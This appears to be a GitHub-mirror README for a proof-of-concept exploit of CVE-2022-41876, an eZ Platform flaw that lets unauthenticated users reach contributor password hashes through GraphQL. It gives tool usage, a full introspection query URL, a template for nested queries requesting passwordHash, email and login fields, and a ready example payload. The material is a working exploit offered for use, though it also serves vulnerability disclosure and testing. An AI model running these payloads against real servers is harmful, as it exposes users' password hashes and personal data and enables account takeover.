Giters

Skileau / CVE-2022-41876

PoC for CVE-2022-41876

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ibexa logo

Python3.9 current version
Twitter Skilo Twitter TahiTi

CVE-2022-41876 - eZ Platform user information disclosure

A vulnerability emerged in eZ Platform letting an unauthenticated user access every contributor password's hash. This PoC enumerates every possible GraphQL path leading to a 'User' object, and then requests these paths to retrieve users' confidential information.

Usage

python3 cve-2022-41876.py -h

usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   Target URL (specify the graphql endpoint)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Number of threads
  -f FILE, --file FILE  Local path to introspect file

Results

image

How it works ?

The different steps followed by this tool to exploit the CVE are:

Retrieving introspect file

The first step to exploit this CVE is to get an introspect.json file. One way to retrieve it is to query the graphql endpoint of the server with the following payload:

https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}

Finding paths to User objects

Then the json given by the server can be used to extract all paths to the 'User' objects with the tool graphql-enum-path like this:

image

Requesting found paths to get users' data

Finally, once all the paths are found, a specific payload must be crafted this way and sent to the server:

https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}

Where elements correspond to the texts between bracket in the result of graphql-enum-path (note that a query must be done for each path).

So, with the graphql-enum-path example above, the first payload would be:

https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}

If the server is vulnerable to this CVE, it will respond to that query with a json file containing its users' data.

References

Hacktricks

graphql-enum-path

Credits

This PoC was created by @Skilo and @TahiTi

About

PoC for CVE-2022-41876

License:MIT License

Languages

Language:Python 100.0%